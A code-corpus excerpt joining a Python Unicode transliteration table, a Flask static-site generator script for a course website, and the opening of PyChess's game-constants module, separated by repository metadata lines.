(0xCE, u"I"),
(0xCF, u"I"),
(0x128, u"I"),
(0x12A, u"I"),
(0x12C, u"I"),
(0x12E, u"I"),
(0x130, u"I"),
(0x196, u"I"),
(0x197, u"I"),
(0x1CF, u"I"),
(0x208, u"I"),
(0x20A, u"I"),
(0x26A, u"I"),
(0x1D7B, u"I"),
(0x1E2C, u"I"),
(0x1E2E, u"I"),
(0x1EC8, u"I"),
(0x1ECA, u"I"),
(0x24BE, u"I"),
(0xA7FE, u"I"),
(0xFF29, u"I"),
(0xEC, u"i"),
(0xED, u"i"),
(0xEE, u"i"),
(0xEF, u"i"),
(0x129, u"i"),
(0x12B, u"i"),
(0x12D, u"i"),
(0x12F, u"i"),
(0x131, u"i"),
(0x1D0, u"i"),
(0x209, u"i"),
(0x20B, u"i"),
(0x268, u"i"),
(0x1D09, u"i"),
(0x1D62, u"i"),
(0x1D7C, u"i"),
(0x1D96, u"i"),
(0x1E2D, u"i"),
(0x1E2F, u"i"),
(0x1EC9, u"i"),
(0x1ECB, u"i"),
(0x2071, u"i"),
(0x24D8, u"i"),
(0xFF49, u"i"),
(0x132, u"IJ"),
(0x24A4, u"(i)"),
(0x133, u"ij"),
(0x134, u"J"),
(0x248, u"J"),
(0x1D0A, u"J"),
(0x24BF, u"J"),
(0xFF2A, u"J"),
(0x135, u"j"),
(0x1F0, u"j"),
(0x237, u"j"),
(0x249, u"j"),
(0x25F, u"j"),
(0x284, u"j"),
(0x29D, u"j"),
(0x24D9, u"j"),
(0x2C7C, u"j"),
(0xFF4A, u"j"),
(0x24A5, u"(j)"),
(0x136, u"K"),
(0x198, u"K"),
(0x1E8, u"K"),
(0x1D0B, u"K"),
(0x1E30, u"K"),
(0x1E32, u"K"),
(0x1E34, u"K"),
(0x24C0, u"K"),
(0x2C69, u"K"),
(0xA740, u"K"),
(0xA742, u"K"),
(0xA744, u"K"),
(0xFF2B, u"K"),
(0x137, u"k"),
(0x199, u"k"),
(0x1E9, u"k"),
(0x29E, u"k"),
(0x1D84, u"k"),
(0x1E31, u"k"),
(0x1E33, u"k"),
(0x1E35, u"k"),
(0x24DA, u"k"),
(0x2C6A, u"k"),
(0xA741, u"k"),
(0xA743, u"k"),
(0xA745, u"k"),
(0xFF4B, u"k"),
(0x24A6, u"(k)"),
(0x139, u"L"),
(0x13B, u"L"),
(0x13D, u"L"),
(0x13F, u"L"),
(0x141, u"L"),
(0x23D, u"L"),
(0x29F, u"L"),
(0x1D0C, u"L"),
(0x1E36, u"L"),
(0x1E38, u"L"),
(0x1E3A, u"L"),
(0x1E3C, u"L"),
(0x24C1, u"L"),
(0x2C60, u"L"),
(0x2C62, u"L"),
(0xA746, u"L"),
(0xA748, u"L"),
(0xA780, u"L"),
(0xFF2C, u"L"),
(0x13A, u"l"),
(0x13C, u"l"),
(0x13E, u"l"),
(0x140, u"l"),
(0x142, u"l"),
(0x19A, u"l"),
(0x234, u"l"),
(0x26B, u"l"),
(0x26C, u"l"),
(0x26D, u"l"),
(0x1D85, u"l"),
(0x1E37, u"l"),
(0x1E39, u"l"),
(0x1E3B, u"l"),
(0x1E3D, u"l"),
(0x24DB, u"l"),
(0x2C61, u"l"),
(0xA747, u"l"),
(0xA749, u"l"),
(0xA781, u"l"),
(0xFF4C, u"l"),
(0x1C7, u"LJ"),
(0x1EFA, u"LL"),
(0x1C8, u"Lj"),
(0x24A7, u"(l)"),
(0x1C9, u"lj"),
(0x1EFB, u"ll"),
(0x2AA, u"ls"),
(0x2AB, u"lz"),
(0x19C, u"M"),
(0x1D0D, u"M"),
(0x1E3E, u"M"),
(0x1E40, u"M"),
(0x1E42, u"M"),
(0x24C2, u"M"),
(0x2C6E, u"M"),
(0xA7FD, u"M"),
(0xA7FF, u"M"),
(0xFF2D, u"M"),
(0x26F, u"m"),
(0x270, u"m"),
(0x271, u"m"),
(0x1D6F, u"m"),
(0x1D86, u"m"),
(0x1E3F, u"m"),
(0x1E41, u"m"),
(0x1E43, u"m"),
(0x24DC, u"m"),
(0xFF4D, u"m"),
(0x24A8, u"(m)"),
(0xD1, u"N"),
(0x143, u"N"),
(0x145, u"N"),
(0x147, u"N"),
(0x14A, u"N"),
(0x19D, u"N"),
(0x1F8, u"N"),
(0x220, u"N"),
(0x274, u"N"),
(0x1D0E, u"N"),
(0x1E44, u"N"),
(0x1E46, u"N"),
(0x1E48, u"N"),
(0x1E4A, u"N"),
(0x24C3, u"N"),
(0xFF2E, u"N"),
(0xF1, u"n"),
(0x144, u"n"),
(0x146, u"n"),
(0x148, u"n"),
(0x149, u"n"),
(0x14B, u"n"),
(0x19E, u"n"),
(0x1F9, u"n"),
(0x235, u"n"),
(0x272, u"n"),
(0x273, u"n"),
(0x1D70, u"n"),
(0x1D87, u"n"),
(0x1E45, u"n"),
(0x1E47, u"n"),
(0x1E49, u"n"),
(0x1E4B, u"n"),
(0x207F, u"n"),
(0x24DD, u"n"),
(0xFF4E, u"n"),
(0x1CA, u"NJ"),
(0x1CB, u"Nj"),
(0x24A9, u"(n)"),
(0x1CC, u"nj"),
(0xD2, u"O"),
(0xD3, u"O"),
(0xD4, u"O"),
(0xD5, u"O"),
(0xD6, u"O"),
(0xD8, u"O"),
(0x14C, u"O"),
(0x14E, u"O"),
(0x150, u"O"),
(0x186, u"O"),
(0x19F, u"O"),
(0x1A0, u"O"),
(0x1D1, u"O"),
(0x1EA, u"O"),
(0x1EC, u"O"),
(0x1FE, u"O"),
(0x20C, u"O"),
(0x20E, u"O"),
(0x22A, u"O"),
(0x22C, u"O"),
(0x22E, u"O"),
(0x230, u"O"),
(0x1D0F, u"O"),
(0x1D10, u"O"),
(0x1E4C, u"O"),
(0x1E4E, u"O"),
(0x1E50, u"O"),
(0x1E52, u"O"),
(0x1ECC, u"O"),
(0x1ECE, u"O"),
(0x1ED0, u"O"),
(0x1ED2, u"O"),
(0x1ED4, u"O"),
(0x1ED6, u"O"),
(0x1ED8, u"O"),
(0x1EDA, u"O"),
(0x1EDC, u"O"),
(0x1EDE, u"O"),
(0x1EE0, u"O"),
(0x1EE2, u"O"),
(0x24C4, u"O"),
(0xA74A, u"O"),
(0xA74C, u"O"),
(0xFF2F, u"O"),
(0xF2, u"o"),
(0xF3, u"o"),
(0xF4, u"o"),
(0xF5, u"o"),
(0xF6, u"o"),
(0xF8, u"o"),
(0x14D, u"o"),
(0x14F, u"o"),
(0x151, u"o"),
(0x1A1, u"o"),
(0x1D2, u"o"),
(0x1EB, u"o"),
(0x1ED, u"o"),
(0x1FF, u"o"),
(0x20D, u"o"),
(0x20F, u"o"),
(0x22B, u"o"),
(0x22D, u"o"),
(0x22F, u"o"),
(0x231, u"o"),
(0x254, u"o"),
(0x275, u"o"),
(0x1D16, u"o"),
(0x1D17, u"o"),
(0x1D97, u"o"),
(0x1E4D, u"o"),
(0x1E4F, u"o"),
(0x1E51, u"o"),
(0x1E53, u"o"),
(0x1ECD, u"o"),
(0x1ECF, u"o"),
(0x1ED1, u"o"),
(0x1ED3, u"o"),
(0x1ED5, u"o"),
(0x1ED7, u"o"),
(0x1ED9, u"o"),
(0x1EDB, u"o"),
(0x1EDD, u"o"),
(0x1EDF, u"o"),
(0x1EE1, u"o"),
(0x1EE3, u"o"),
(0x2092, u"o"),
(0x24DE, u"o"),
(0x2C7A, u"o"),
(0xA74B, u"o"),
(0xA74D, u"o"),
(0xFF4F, u"o"),
(0x152, u"OE"),
(0x276, u"OE"),
(0xA74E, u"OO"),
(0x222, u"OU"),
(0x1D15, u"OU"),
(0x24AA, u"(o)"),
(0x153, u"oe"),
(0x1D14, u"oe"),
(0xA74F, u"oo"),
(0x223, u"ou"),
(0x1A4, u"P"),
(0x1D18, u"P"),
(0x1E54, u"P"),
(0x1E56, u"P"),
(0x24C5, u"P"),
(0x2C63, u"P"),
(0xA750, u"P"),
(0xA752, u"P"),
(0xA754, u"P"),
(0xFF30, u"P"),
(0x1A5, u"p"),
(0x1D71, u"p"),
(0x1D7D, u"p"),
(0x1D88, u"p"),
(0x1E55, u"p"),
(0x1E57, u"p"),
(0x24DF, u"p"),
(0xA751, u"p"),
(0xA753, u"p"),
(0xA755, u"p"),
(0xA7FC, u"p"),
(0xFF50, u"p"),
(0x24AB, u"(p)"),
(0x24A, u"Q"),
(0x24C6, u"Q"),
(0xA756, u"Q"),
(0xA758, u"Q"),
(0xFF31, u"Q"),
(0x138, u"q"),
(0x24B, u"q"),
(0x2A0, u"q"),
(0x24E0, u"q"),
(0xA757, u"q"),
(0xA759, u"q"),
(0xFF51, u"q"),
(0x24AC, u"(q)"),
(0x239, u"qp"),
(0x154, u"R"),
(0x156, u"R"),
(0x158, u"R"),
(0x210, u"R"),
(0x212, u"R"),
(0x24C, u"R"),
(0x280, u"R"),
(0x281, u"R"),
(0x1D19, u"R"),
(0x1D1A, u"R"),
(0x1E58, u"R"),
(0x1E5A, u"R"),
(0x1E5C, u"R"),
(0x1E5E, u"R"),
(0x24C7, u"R"),
(0x2C64, u"R"),
(0xA75A, u"R"),
(0xA782, u"R"),
(0xFF32, u"R"),
(0x155, u"r"),
(0x157, u"r"),
(0x159, u"r"),
(0x211, u"r"),
(0x213, u"r"),
(0x24D, u"r"),
(0x27C, u"r"),
(0x27D, u"r"),
(0x27E, u"r"),
(0x27F, u"r"),
(0x1D63, u"r"),
(0x1D72, u"r"),
(0x1D73, u"r"),
(0x1D89, u"r"),
(0x1E59, u"r"),
(0x1E5B, u"r"),
(0x1E5D, u"r"),
(0x1E5F, u"r"),
(0x24E1, u"r"),
(0xA75B, u"r"),
(0xA783, u"r"),
(0xFF52, u"r"),
(0x24AD, u"(r)"),
(0x15A, u"S"),
(0x15C, u"S"),
(0x15E, u"S"),
(0x160, u"S"),
(0x218, u"S"),
(0x1E60, u"S"),
(0x1E62, u"S"),
(0x1E64, u"S"),
(0x1E66, u"S"),
(0x1E68, u"S"),
(0x24C8, u"S"),
(0xA731, u"S"),
(0xA785, u"S"),
(0xFF33, u"S"),
(0x15B, u"s"),
(0x15D, u"s"),
(0x15F, u"s"),
(0x161, u"s"),
(0x17F, u"s"),
(0x219, u"s"),
(0x23F, u"s"),
(0x282, u"s"),
(0x1D74, u"s"),
(0x1D8A, u"s"),
(0x1E61, u"s"),
(0x1E63, u"s"),
(0x1E65, u"s"),
(0x1E67, u"s"),
(0x1E69, u"s"),
(0x1E9C, u"s"),
(0x1E9D, u"s"),
(0x24E2, u"s"),
(0xA784, u"s"),
(0xFF53, u"s"),
(0x1E9E, u"SS"),
(0x24AE, u"(s)"),
(0xDF, u"ss"),
(0xFB06, u"st"),
(0x162, u"T"),
(0x164, u"T"),
(0x166, u"T"),
(0x1AC, u"T"),
(0x1AE, u"T"),
(0x21A, u"T"),
(0x23E, u"T"),
(0x1D1B, u"T"),
(0x1E6A, u"T"),
(0x1E6C, u"T"),
(0x1E6E, u"T"),
(0x1E70, u"T"),
(0x24C9, u"T"),
(0xA786, u"T"),
(0xFF34, u"T"),
(0x163, u"t"),
(0x165, u"t"),
(0x167, u"t"),
(0x1AB, u"t"),
(0x1AD, u"t"),
(0x21B, u"t"),
(0x236, u"t"),
(0x287, u"t"),
(0x288, u"t"),
(0x1D75, u"t"),
(0x1E6B, u"t"),
(0x1E6D, u"t"),
(0x1E6F, u"t"),
(0x1E71, u"t"),
(0x1E97, u"t"),
(0x24E3, u"t"),
(0x2C66, u"t"),
(0xFF54, u"t"),
(0xDE, u"TH"),
(0xA766, u"TH"),
(0xA728, u"TZ"),
(0x24AF, u"(t)"),
(0x2A8, u"tc"),
(0xFE, u"th"),
(0x1D7A, u"th"),
(0xA767, u"th"),
(0x2A6, u"ts"),
(0xA729, u"tz"),
(0xD9, u"U"),
(0xDA, u"U"),
(0xDB, u"U"),
(0xDC, u"U"),
(0x168, u"U"),
(0x16A, u"U"),
(0x16C, u"U"),
(0x16E, u"U"),
(0x170, u"U"),
(0x172, u"U"),
(0x1AF, u"U"),
(0x1D3, u"U"),
(0x1D5, u"U"),
(0x1D7, u"U"),
(0x1D9, u"U"),
(0x1DB, u"U"),
(0x214, u"U"),
(0x216, u"U"),
(0x244, u"U"),
(0x1D1C, u"U"),
(0x1D7E, u"U"),
(0x1E72, u"U"),
(0x1E74, u"U"),
(0x1E76, u"U"),
(0x1E78, u"U"),
(0x1E7A, u"U"),
(0x1EE4, u"U"),
(0x1EE6, u"U"),
(0x1EE8, u"U"),
(0x1EEA, u"U"),
(0x1EEC, u"U"),
(0x1EEE, u"U"),
(0x1EF0, u"U"),
(0x24CA, u"U"),
(0xFF35, u"U"),
(0xF9, u"u"),
(0xFA, u"u"),
(0xFB, u"u"),
(0xFC, u"u"),
(0x169, u"u"),
(0x16B, u"u"),
(0x16D, u"u"),
(0x16F, u"u"),
(0x171, u"u"),
(0x173, u"u"),
(0x1B0, u"u"),
(0x1D4, u"u"),
(0x1D6, u"u"),
(0x1D8, u"u"),
(0x1DA, u"u"),
(0x1DC, u"u"),
(0x215, u"u"),
(0x217, u"u"),
(0x289, u"u"),
(0x1D64, u"u"),
(0x1D99, u"u"),
(0x1E73, u"u"),
(0x1E75, u"u"),
(0x1E77, u"u"),
(0x1E79, u"u"),
(0x1E7B, u"u"),
(0x1EE5, u"u"),
(0x1EE7, u"u"),
(0x1EE9, u"u"),
(0x1EEB, u"u"),
(0x1EED, u"u"),
(0x1EEF, u"u"),
(0x1EF1, u"u"),
(0x24E4, u"u"),
(0xFF55, u"u"),
(0x24B0, u"(u)"),
(0x1D6B, u"ue"),
(0x1B2, u"V"),
(0x245, u"V"),
(0x1D20, u"V"),
(0x1E7C, u"V"),
(0x1E7E, u"V"),
(0x1EFC, u"V"),
(0x24CB, u"V"),
(0xA75E, u"V"),
(0xA768, u"V"),
(0xFF36, u"V"),
(0x28B, u"v"),
(0x28C, u"v"),
(0x1D65, u"v"),
(0x1D8C, u"v"),
(0x1E7D, u"v"),
(0x1E7F, u"v"),
(0x24E5, u"v"),
(0x2C71, u"v"),
(0x2C74, u"v"),
(0xA75F, u"v"),
(0xFF56, u"v"),
(0xA760, u"VY"),
(0x24B1, u"(v)"),
(0xA761, u"vy"),
(0x174, u"W"),
(0x1F7, u"W"),
(0x1D21, u"W"),
(0x1E80, u"W"),
(0x1E82, u"W"),
(0x1E84, u"W"),
(0x1E86, u"W"),
(0x1E88, u"W"),
(0x24CC, u"W"),
(0x2C72, u"W"),
(0xFF37, u"W"),
(0x175, u"w"),
(0x1BF, u"w"),
(0x28D, u"w"),
(0x1E81, u"w"),
(0x1E83, u"w"),
(0x1E85, u"w"),
(0x1E87, u"w"),
(0x1E89, u"w"),
(0x1E98, u"w"),
(0x24E6, u"w"),
(0x2C73, u"w"),
(0xFF57, u"w"),
(0x24B2, u"(w)"),
(0x1E8A, u"X"),
(0x1E8C, u"X"),
(0x24CD, u"X"),
(0xFF38, u"X"),
(0x1D8D, u"x"),
(0x1E8B, u"x"),
(0x1E8D, u"x"),
(0x2093, u"x"),
(0x24E7, u"x"),
(0xFF58, u"x"),
(0x24B3, u"(x)"),
(0xDD, u"Y"),
(0x176, u"Y"),
(0x178, u"Y"),
(0x1B3, u"Y"),
(0x232, u"Y"),
(0x24E, u"Y"),
(0x28F, u"Y"),
(0x1E8E, u"Y"),
(0x1EF2, u"Y"),
(0x1EF4, u"Y"),
(0x1EF6, u"Y"),
(0x1EF8, u"Y"),
(0x1EFE, u"Y"),
(0x24CE, u"Y"),
(0xFF39, u"Y"),
(0xFD, u"y"),
(0xFF, u"y"),
(0x177, u"y"),
(0x1B4, u"y"),
(0x233, u"y"),
(0x24F, u"y"),
(0x28E, u"y"),
(0x1E8F, u"y"),
(0x1E99, u"y"),
(0x1EF3, u"y"),
(0x1EF5, u"y"),
(0x1EF7, u"y"),
(0x1EF9, u"y"),
(0x1EFF, u"y"),
(0x24E8, u"y"),
(0xFF59, u"y"),
(0x24B4, u"(y)"),
(0x179, u"Z"),
(0x17B, u"Z"),
(0x17D, u"Z"),
(0x1B5, u"Z"),
(0x21C, u"Z"),
(0x224, u"Z"),
(0x1D22, u"Z"),
(0x1E90, u"Z"),
(0x1E92, u"Z"),
(0x1E94, u"Z"),
(0x24CF, u"Z"),
(0x2C6B, u"Z"),
(0xA762, u"Z"),
(0xFF3A, u"Z"),
(0x17A, u"z"),
(0x17C, u"z"),
(0x17E, u"z"),
(0x1B6, u"z"),
(0x21D, u"z"),
(0x225, u"z"),
(0x240, u"z"),
(0x290, u"z"),
(0x291, u"z"),
(0x1D76, u"z"),
(0x1D8E, u"z"),
(0x1E91, u"z"),
(0x1E93, u"z"),
(0x1E95, u"z"),
(0x24E9, u"z"),
(0x2C6C, u"z"),
(0xA763, u"z"),
(0xFF5A, u"z"),
(0x24B5, u"(z)"),
(0x2070, u"0"),
(0x2080, u"0"),
(0x24EA, u"0"),
(0x24FF, u"0"),
(0xFF10, u"0"),
(0xB9, u"1"),
(0x2081, u"1"),
(0x2460, u"1"),
(0x24F5, u"1"),
(0x2776, u"1"),
(0x2780, u"1"),
(0x278A, u"1"),
(0xFF11, u"1"),
(0x2488, u"1."),
(0x2474, u"(1)"),
(0xB2, u"2"),
(0x2082, u"2"),
(0x2461, u"2"),
(0x24F6, u"2"),
(0x2777, u"2"),
(0x2781, u"2"),
(0x278B, u"2"),
(0xFF12, u"2"),
(0x2489, u"2."),
(0x2475, u"(2)"),
(0xB3, u"3"),
(0x2083, u"3"),
(0x2462, u"3"),
(0x24F7, u"3"),
(0x2778, u"3"),
(0x2782, u"3"),
(0x278C, u"3"),
(0xFF13, u"3"),
(0x248A, u"3."),
(0x2476, u"(3)"),
(0x2074, u"4"),
(0x2084, u"4"),
(0x2463, u"4"),
(0x24F8, u"4"),
(0x2779, u"4"),
(0x2783, u"4"),
(0x278D, u"4"),
(0xFF14, u"4"),
(0x248B, u"4."),
(0x2477, u"(4)"),
(0x2075, u"5"),
(0x2085, u"5"),
(0x2464, u"5"),
(0x24F9, u"5"),
(0x277A, u"5"),
(0x2784, u"5"),
(0x278E, u"5"),
(0xFF15, u"5"),
(0x248C, u"5."),
(0x2478, u"(5)"),
(0x2076, u"6"),
(0x2086, u"6"),
(0x2465, u"6"),
(0x24FA, u"6"),
(0x277B, u"6"),
(0x2785, u"6"),
(0x278F, u"6"),
(0xFF16, u"6"),
(0x248D, u"6."),
(0x2479, u"(6)"),
(0x2077, u"7"),
(0x2087, u"7"),
(0x2466, u"7"),
(0x24FB, u"7"),
(0x277C, u"7"),
(0x2786, u"7"),
(0x2790, u"7"),
(0xFF17, u"7"),
(0x248E, u"7."),
(0x247A, u"(7)"),
(0x2078, u"8"),
(0x2088, u"8"),
(0x2467, u"8"),
(0x24FC, u"8"),
(0x277D, u"8"),
(0x2787, u"8"),
(0x2791, u"8"),
(0xFF18, u"8"),
(0x248F, u"8."),
(0x247B, u"(8)"),
(0x2079, u"9"),
(0x2089, u"9"),
(0x2468, u"9"),
(0x24FD, u"9"),
(0x277E, u"9"),
(0x2788, u"9"),
(0x2792, u"9"),
(0xFF19, u"9"),
(0x2490, u"9."),
(0x247C, u"(9)"),
(0x2469, u"10"),
(0x24FE, u"10"),
(0x277F, u"10"),
(0x2789, u"10"),
(0x2793, u"10"),
(0x2491, u"10."),
(0x247D, u"(10)"),
(0x246A, u"11"),
(0x24EB, u"11"),
(0x2492, u"11."),
(0x247E, u"(11)"),
(0x246B, u"12"),
(0x24EC, u"12"),
(0x2493, u"12."),
(0x247F, u"(12)"),
(0x246C, u"13"),
(0x24ED, u"13"),
(0x2494, u"13."),
(0x2480, u"(13)"),
(0x246D, u"14"),
(0x24EE, u"14"),
(0x2495, u"14."),
(0x2481, u"(14)"),
(0x246E, u"15"),
(0x24EF, u"15"),
(0x2496, u"15."),
(0x2482, u"(15)"),
(0x246F, u"16"),
(0x24F0, u"16"),
(0x2497, u"16."),
(0x2483, u"(16)"),
(0x2470, u"17"),
(0x24F1, u"17"),
(0x2498, u"17."),
(0x2484, u"(17)"),
(0x2471, u"18"),
(0x24F2, u"18"),
(0x2499, u"18."),
(0x2485, u"(18)"),
(0x2472, u"19"),
(0x24F3, u"19"),
(0x249A, u"19."),
(0x2486, u"(19)"),
(0x2473, u"20"),
(0x24F4, u"20"),
(0x249B, u"20."),
(0x2487, u"(20)"),
(0xAB, u'"'),
(0xBB, u'"'),
(0x201C, u'"'),
(0x201D, u'"'),
(0x201E, u'"'),
(0x2033, u'"'),
(0x2036, u'"'),
(0x275D, u'"'),
(0x275E, u'"'),
(0x276E, u'"'),
(0x276F, u'"'),
(0xFF02, u'"'),
(0x2018, u"'"),
(0x2019, u"'"),
(0x201A, u"'"),
(0x201B, u"'"),
(0x2032, u"'"),
(0x2035, u"'"),
(0x2039, u"'"),
(0x203A, u"'"),
(0x275B, u"'"),
(0x275C, u"'"),
(0xFF07, u"'"),
(0x2010, u"-"),
(0x2011, u"-"),
(0x2012, u"-"),
(0x2013, u"-"),
(0x2014, u"-"),
(0x207B, u"-"),
(0x208B, u"-"),
(0xFF0D, u"-"),
(0x2045, u"["),
(0x2772, u"["),
(0xFF3B, u"["),
(0x2046, u"]"),
(0x2773, u"]"),
(0xFF3D, u"]"),
(0x207D, u"("),
(0x208D, u"("),
(0x2768, u"("),
(0x276A, u"("),
(0xFF08, u"("),
(0x2E28, u"(("),
(0x207E, u")"),
(0x208E, u")"),
(0x2769, u")"),
(0x276B, u")"),
(0xFF09, u")"),
(0x2E29, u"))"),
(0x276C, u"<"),
(0x2770, u"<"),
(0xFF1C, u"<"),
(0x276D, u">"),
(0x2771, u">"),
(0xFF1E, u">"),
(0x2774, u"{"),
(0xFF5B, u"{"),
(0x2775, u"}"),
(0xFF5D, u"}"),
(0x207A, u"+"),
(0x208A, u"+"),
(0xFF0B, u"+"),
(0x207C, u"="),
(0x208C, u"="),
(0xFF1D, u"="),
(0xFF01, u"!"),
(0x203C, u"!!"),
(0x2049, u"!?"),
(0xFF03, u"#"),
(0xFF04, u"$"),
(0x2052, u"%"),
(0xFF05, u"%"),
(0xFF06, u"&"),
(0x204E, u"*"),
(0xFF0A, u"*"),
(0xFF0C, u","),
(0xFF0E, u"."),
(0x2044, u"/"),
(0xFF0F, u"/"),
(0xFF1A, u":"),
(0x204F, u";"),
(0xFF1B, u";"),
(0xFF1F, u"?"),
(0x2047, u"??"),
(0x2048, u"?!"),
(0xFF20, u"@"),
(0xFF3C, u"\\"),
(0x2038, u"^"),
(0xFF3E, u"^"),
(0xFF3F, u"_"),
(0x2053, u"~"),
(0xFF5E, u"~"),
]
translate_table = codepoint_to_self + codepoint_to_replacement
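# Usage sketch: the (codepoint, replacement) pairs above are intended for
# unicode.translate(), e.g.
#     table = dict(translate_table)
#     u"D\xe9p\xf4t".translate(table)   # -> u"Depot"
# Codepoints without an entry are passed through unchanged; callers that want
# to strip or replace unmapped characters must handle that separately.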
| gpl-3.0 | 514,629,070,680,057,000 | -4,901,167,563,007,123,000 | 18.654401 | 62 | 0.383429 | false |
lem-usp/Bio507 | site.py | 1 | 3672 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals  # unicode by default
import sys
import datetime
from collections import OrderedDict

import pandoc
#import bib

from flask import Flask
from flask import render_template, redirect, url_for
from flaskext.babel import Babel
from flask_flatpages import FlatPages
from flask_frozen import Freezer

# TODO:
# * Get babel locale from request path

# Create the Flask app
app = Flask(__name__)

# Load settings
app.config.from_pyfile('settings/common.py')
app.config.from_pyfile('settings/local_settings.py', silent=True)
if len(sys.argv) > 2:
    extra_conf = sys.argv[2]
    app.config.from_pyfile('settings/{}_settings.py'.format(extra_conf), silent=True)

# Add the babel extension
babel = Babel(app)

# Add the FlatPages extension
pages = FlatPages(app)

# Add the Frozen extension
freezer = Freezer(app)


#
# Utils
#

# Frozen url generators

@freezer.register_generator
def default_locale_urls():
    ''' Generates the urls for the default locale without prefix. '''
    for page in pages:
        yield '/{}/'.format(remove_l10n_prefix(page.path))

@freezer.register_generator
def page_urls():
    ''' Generates the urls with locale prefix. '''
    for page in pages:
        yield '/{}/'.format(page.path)

# l10n helpers

def has_l10n_prefix(path):
    ''' Verifies if the path has a localization prefix. '''
    return reduce(lambda x, y: x or y, [path.startswith(l)
                  for l in app.config.get('AVAILABLE_LOCALES', [])])

def add_l10n_prefix(path, locale=app.config.get('DEFAULT_LOCALE')):
    ''' Adds the localization prefix if necessary. '''
    return path if has_l10n_prefix(path) else '{}/{}'.format(locale, path)

def remove_l10n_prefix(path, locale=app.config.get('DEFAULT_LOCALE')):
    ''' Removes a specific localization prefix. '''
    return path if not path.startswith(locale) else path[(len(locale) + 1):]

# Make remove_l10n_prefix accessible to Jinja
app.jinja_env.globals.update(remove_l10n_prefix=remove_l10n_prefix)

# Structure helpers

def render_markdown(text):
    ''' Render Markdown text to HTML. '''
    doc = pandoc.Document()
    # doc.bib(app.config.get('BIB_FILE', 'static/papers.bib'))
    doc.markdown = text.encode('utf8')
    return unicode(doc.html, 'utf8')

app.config['FLATPAGES_HTML_RENDERER'] = render_markdown


#
# Routes
#

@app.route('/')
def root():
    ''' Main page '''
    # Get the page
    path = 'Main'
    page = pages.get_or_404(add_l10n_prefix(path))
    today = datetime.datetime.now().strftime("%B %dth %Y")
    return render_template('root.html', today=today, page=page, pages=pages)

#def get_papers():
#    bib_file = open(app.config.get('BIB_FILE', 'static/papers.bib'))
#    b = bib.Bibparser(bib_file.read())
#    b.parse()
#    return b

@app.route('/<path:path>/')
def page(path):
    ''' All pages from markdown files '''
    # Get the page
    page = pages.get_or_404(add_l10n_prefix(path))

    # Get custom template
    template = page.meta.get('template', 'page.html')

    # Verify if need redirect
    redirect_ = page.meta.get('redirect', None)
    if redirect_:
        return redirect(url_for('page', path=redirect_))

    # if path == 'Papers' or path == add_l10n_prefix('Papers'):
    #     b = get_papers()
    #     return render_template(template, page=page, pages=pages, bib=b)

    today = datetime.datetime.now().strftime("%B %dth %Y")
    # Render the page
    return render_template(template, page=page, today=today, pages=pages)


#
# Main
#

if __name__ == '__main__':
    if len(sys.argv) > 1 and sys.argv[1] == 'build':
        freezer.freeze()
    else:
        app.run(port=8000)
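# Invocation summary: "python site.py" serves the Frozen-Flask/FlatPages site on
# port 8000, "python site.py build" writes the static build via freezer.freeze(),
# and an optional second argument selects an extra settings/<name>_settings.py file.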
| mit | 8,909,783,212,581,088,000 | 8,342,799,932,278,771,000 | 24.324138 | 85 | 0.663399 | false |
importsfromgooglecode/pychess | lib/pychess/Utils/const.py | 20 | 9143 |
# -*- coding: UTF-8 -*-
################################################################################
# PyChess information #
################################################################################
NAME = "PyChess"
ENGINES_XML_API_VERSION = "0.12"
################################################################################
# Player info #
################################################################################
# Player types
LOCAL, ARTIFICIAL, REMOTE = range(3)
# Engine strengths
EASY, INTERMEDIATE, EXPERT = range(3)
# Player colors
WHITE, BLACK = range(2)
################################################################################
# Game values #
################################################################################
# Game states
WAITING_TO_START, PAUSED, RUNNING, DRAW, WHITEWON, BLACKWON, KILLED, \
ADJOURNED, ABORTED, UNKNOWN_STATE = range(10)
reprResult = ["*", "*", "*", "1/2-1/2", "1-0", "0-1", "?", "*", "?", "?"]
UNDOABLE_STATES = (DRAW, WHITEWON, BLACKWON)
UNFINISHED_STATES = (WAITING_TO_START, PAUSED, RUNNING, UNKNOWN_STATE)
# Chess variants
NORMALCHESS, CORNERCHESS, SHUFFLECHESS, FISCHERRANDOMCHESS, RANDOMCHESS, \
ASYMMETRICRANDOMCHESS, UPSIDEDOWNCHESS, PAWNSPUSHEDCHESS, PAWNSPASSEDCHESS, \
THEBANCHESS, PAWNODDSCHESS, KNIGHTODDSCHESS, ROOKODDSCHESS, QUEENODDSCHESS, \
BLINDFOLDCHESS, HIDDENPAWNSCHESS, HIDDENPIECESCHESS, ALLWHITECHESS, \
ATOMICCHESS, BUGHOUSECHESS, CRAZYHOUSECHESS, LOSERSCHESS, SUICIDECHESS, \
WILDCASTLECHESS, WILDCASTLESHUFFLECHESS, KINGOFTHEHILLCHESS = range(26)
UNSUPPORTED = (BUGHOUSECHESS,)
# Chess variant groups
VARIANTS_BLINDFOLD, VARIANTS_ODDS, VARIANTS_SHUFFLE, VARIANTS_OTHER, VARIANTS_OTHER_NONSTANDARD = range(5)
# Action errors
ACTION_ERROR_NOT_OUT_OF_TIME, \
ACTION_ERROR_CLOCK_NOT_STARTED, ACTION_ERROR_SWITCH_UNDERWAY, \
ACTION_ERROR_CLOCK_NOT_PAUSED, ACTION_ERROR_TOO_LARGE_UNDO, \
ACTION_ERROR_NONE_TO_ACCEPT, ACTION_ERROR_NONE_TO_WITHDRAW, \
ACTION_ERROR_NONE_TO_DECLINE, = range(8)
# Game state reasons
ABORTED_ADJUDICATION, ABORTED_AGREEMENT, ABORTED_COURTESY, ABORTED_EARLY, \
ABORTED_SERVER_SHUTDOWN, ADJOURNED_COURTESY, ABORTED_DISCONNECTION, \
ADJOURNED_AGREEMENT, ADJOURNED_LOST_CONNECTION, ADJOURNED_SERVER_SHUTDOWN, \
ADJOURNED_COURTESY_WHITE, ADJOURNED_COURTESY_BLACK, \
ADJOURNED_LOST_CONNECTION_WHITE, ADJOURNED_LOST_CONNECTION_BLACK, \
DRAW_50MOVES, DRAW_ADJUDICATION, DRAW_AGREE, DRAW_CALLFLAG, DRAW_INSUFFICIENT, \
DRAW_EQUALMATERIAL, DRAW_LENGTH, DRAW_REPITITION, DRAW_STALEMATE, \
DRAW_BLACKINSUFFICIENTANDWHITETIME, DRAW_WHITEINSUFFICIENTANDBLACKTIME, \
WON_ADJUDICATION, WON_CALLFLAG, WON_DISCONNECTION, WON_MATE, WON_RESIGN, \
WON_LESSMATERIAL, WON_NOMATERIAL, WON_KINGEXPLODE, WON_KINGINCENTER, \
